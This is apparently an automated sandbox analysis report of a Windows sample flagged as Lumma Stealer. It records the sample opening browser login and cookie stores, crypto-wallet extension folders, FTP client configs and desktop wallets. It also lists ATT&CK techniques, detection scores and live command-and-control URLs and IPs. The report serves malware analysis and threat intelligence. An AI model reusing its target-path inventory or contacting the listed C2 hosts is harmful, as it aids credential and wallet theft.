            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Binance
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
            Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\WKXEWIOTXI
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\WKXEWIOTXI
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\FENIVHOIKN
            Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\FENIVHOIKN
            Source: Yara match | File source: 00000000.00000003.1638752339.0000000000A17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.1638552100.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: file.exe PID: 8384, type: MEMORYSTR

            Remote Access Functionality

Source: Yara match | File source: Process Memory Space: file.exe PID: 8384, type: MEMORYSTR
Source: Yara match | File source: 0.2.file.exe.ad0000.0.unpack, type: UNPACKEDPE
MITRE ATT&CK Matrix

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 44 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 861 Security Software Discovery | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 44 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 41 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 13 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 4 Obfuscated Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 223 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

Source | Detection | Scanner | Label
file.exe | 61% | ReversingLabs | Win32.Trojan.LummaStealer
file.exe | 57% | Virustotal |
file.exe | 100% | Avira | TR/Crypt.XPACK.Gen
No Antivirus matches
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
https://jowinjoinery.icu/bdWUaq | 0% | Avira URL Cloud | safe
https://jowinjoinery.icu/bdWUate | 0% | Avira URL Cloud | safe
https://jowinjoinery.icu/d | 0% | Avira URL Cloud | safe
https://jowinjoinery.icu/bdWUas | 0% | Avira URL Cloud | safe
https://jowinjoinery.icu/bdWUaY: | 0% | Avira URL Cloud | safe
https://jowinjoinery.icu/Y | 0% | Avira URL Cloud | safe
https://jowinjoinery.icu/ | 0% | Avira URL Cloud | safe
https://jowinjoinery.icu/bdWUa5#Q | 0% | Avira URL Cloud | safe
https://jowinjoinery.icu/bdWUa | 100% | Avira URL Cloud | malware
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | 0% | Avira URL Cloud | safe
https://jowinjoinery.icu:443/bdWUa | 100% | Avira URL Cloud | malware
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
jowinjoinery.icu | 188.114.97.3 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://jowinjoinery.icu/bdWUa | false | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://jowinjoinery.icu/ | file.exe, 00000000.00000003.1757937967.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731493953.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732071121.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1636635709.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1758154655.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758913821.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732052923.0000000000A74000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://jowinjoinery.icu/bdWUate | file.exe, 00000000.00000003.1757851048.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758627826.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://jowinjoinery.icu/bdWUas | file.exe, 00000000.00000003.1757851048.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758627826.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jowinjoinery.icu/bdWUaq | file.exe, 00000000.00000003.1636635709.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org?q= | file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://jowinjoinery.icu/Y | file.exe, 00000000.00000003.1731493953.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732071121.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1636635709.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732052923.0000000000A74000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.rootca1.amazontrust.com0: | file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://jowinjoinery.icu/d | file.exe, 00000000.00000003.1676517185.0000000000A72000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta | file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://jowinjoinery.icu/bdWUa5#Q | file.exe, 00000000.00000003.1757937967.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731493953.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1758154655.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731882460.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jowinjoinery.icu/bdWUaY: | file.exe, 00000000.00000003.1757937967.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758913821.0000000000A72000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico | file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/v20 | file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg | file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://jowinjoinery.icu:443/bdWUa | file.exe, 00000000.00000003.1697028773.00000000009FD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0? | file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtabv209h | file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref | file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477 | file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/products/firefoxgro.all | file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://jowinjoinery.icu/D | file.exe, 00000000.00000003.1757937967.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1758154655.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758913821.0000000000A78000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://gemini.google.com/app?q= | file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | jowinjoinery.icu | European Union | 13335 | CLOUDFLARENETUS | true
                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1634236
                                                            Start date and time:2025-03-10 21:03:50 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 4m 39s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:6
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:file.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:Failed
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Stop behavior analysis, all processes terminated
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
                                                            • Excluded IPs from analysis (whitelisted): 23.60.203.209, 104.96.149.92, 20.109.210.53, 150.171.27.10
                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, g.bing.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
16:05:06 | API Interceptor | 93x Sleep call for process: file.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
188.114.97.3 | ulQGCeP6wq.exe | malicious | FormBook | www.braposaldesk.cyou/a5hz/
188.114.97.3 | ungziped_file.exe | malicious | FormBook | www.actpisalnplay.cyou/3vjo/
188.114.97.3 | Payment-031025-pdf.exe | malicious | FormBook | www.timeinsardinia.info/jjft/
188.114.97.3 | F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe | malicious | FormBook | www.shuangunder.shop/udq7/
188.114.97.3 | jzqc1V4NqB.exe | malicious | FormBook | www.sislieskort.xyz/glm7/?WBuDj=c3cNohkT5nIdW2eyEx8s7+0O2NNiR/tgpQEW4SezL5ftNCrKyIMnC5N2KYOJPpUbAjTm2X+3v3M3VE72mVE/oleOey1kataonb6oQhexxcfP9PB04Q==&Jzwht=FNiD
188.114.97.3 | CjbMEPJZ3J.exe | malicious | FormBook | www.desktitle.homes/izqs/?8v4Hv=cpKH3h&bnb=znOuwYiaskOFcyM/GsSqn0JEMJbSyMHsSdveYB/23/UFYHNBzQzlITz69DD5sgGZofP3y1oDPTsA91VvhFndYIKmLNl26ZFfZBVczyXjFCmbdDFThg==
188.114.97.3 | rPO-20429124.exe | malicious | FormBook | www.sld6.rest/q0rl/
